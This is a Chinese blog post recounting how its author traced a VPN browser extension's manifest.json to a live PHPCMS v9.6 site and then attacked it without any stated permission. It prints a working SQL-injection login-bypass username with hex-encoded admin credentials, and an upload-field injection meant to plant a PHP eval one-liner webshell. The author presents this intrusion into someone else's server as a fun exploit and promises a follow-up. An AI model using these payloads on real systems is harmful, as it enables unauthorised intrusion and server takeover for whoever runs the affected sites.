深蓝零安致力于打造网络安全教程免费分享平台
为更多喜爱web安全的朋友提供力所能及的帮助

追踪某浏览器vpn到进入后台

此次事出有因!原因有两点:第一,昨天在这个博客发布了一篇文章,是为了推荐一个免费翻墙的浏览器,结果有兄弟下载了安装了,说是有两遍捆绑,而且安装完成还弹出了黄色的网站,这让我很尴尬了%e8%af%84%e8%ae%ba %e5%b0%b4%e5%b0%ac

不过这还没有引起我的足够重视,毕竟我是屌丝,不在乎这些!第二,晚上的时候,突然发现以前用的浏览器不能翻墙了,想来想去是不是应该吧那个能翻墙的浏览器的插件拔下来放到我这个浏览器上用,结果特么悲剧了,安装成功却用不了!

%e6%8f%92%e4%bb%b6%e5%ae%89%e8%a3%85

google%e6%89%93%e4%b8%8d%e5%bc%80

什么原因求大婶们赐教!

基于这两点原因,我突然想看看vpn插件里面有什么!结果一看然我忍不住了!插件是crx的格式,怎么打开呢?百度一下,发下改后缀名为压缩格式zip 之类的,然后解压就可以了,吆西,原来是这样,赶忙照做了一遍,你还别说,还真是这样!解压出来有好几个文件

%e6%8f%92%e4%bb%b6%e8%a7%a3%e5%8e%8b

打开了全部文件,发下里面manifest.json这个文件有好东西,发现了个url,会不是vpn下服务器地址呢?这个真不知道,直到最后我都不知道!

%e6%8f%92%e4%bb%b6%e4%bb%a3%e7%a0%81

好吧,发现http://马赛克/cms,打开后是一个站点

cms

翻到底部发现是个phpcms v9.6的版本,直觉直觉告诉我应该有漏洞(其实我是猜的,因为之前我并不知道这个版本有漏洞,毕竟咱是小白)

phpcms

然后赶紧去问了度娘,度娘告诉我的漏洞让我整整笑了一分钟!笑完了,咱们继续!原来这个漏洞在后台登录的地方有注入,通过构造语句可以可以直接以管理员身份登录后台!

用户名:誠’ union select 1,0x706870636D73,0x3831346539303966363566316439313263646237636333393833623934333239,4,1,6,7 — k

密码:1

phpcmsv9-6%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8

之后遍顺利的进入了后台:

phpcms%e5%90%8e%e5%8f%b0

看到这里,我们就会想起三字经,(此处省略三字经,PS:实际本屌丝也没记住,反正就是这个意思吧),找上传点,然后上传木马,当然这是构造上传,直接写入一句话:

%e6%9e%84%e9%80%a0%e4%b8%8a%e4%bc%a0

在这里,我们构造上传

name=”data[uc_api’,’11’);/*]”

并在Ucenter api 地址输入:*/eval($_REQUEST[test]);//

理论上这样我们应该是成功写入了一句话,理想情况下,应该是这样:

%e8%8f%9c%e5%88%80当然,这也是抠来的图,但是现实却是这样的:

%e8%8f%9c%e5%88%801

到这里我心都碎了,人品问题么?依我看,应该是木马被杀了,有防火墙!反正没成功!本来想找龙表哥帮忙,结果他一直看片没时间,想想,算了吧,好累,到这就结束了,反正想传达的就是这个思想!

最后载ps一下,发表这篇文章的时候是直接边截图边在后台编辑文章的,结果浏览器跟菜刀有了冲突,直接闪退了,还是两次,都写到一半就退了,气的我差点晕厥!后来还是又坚持重新写完了,这里我不是想说我有多么耐心,我只是想说以后谁在写的时候一定要边写边保存,好了就到这里吧!

如果后面再拿了这个webshell,一定写出来!

此文来自深蓝零安——路人甲!请各位大牛扶正!

未经允许不得转载此文深蓝零安 » 追踪某浏览器vpn到进入后台

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址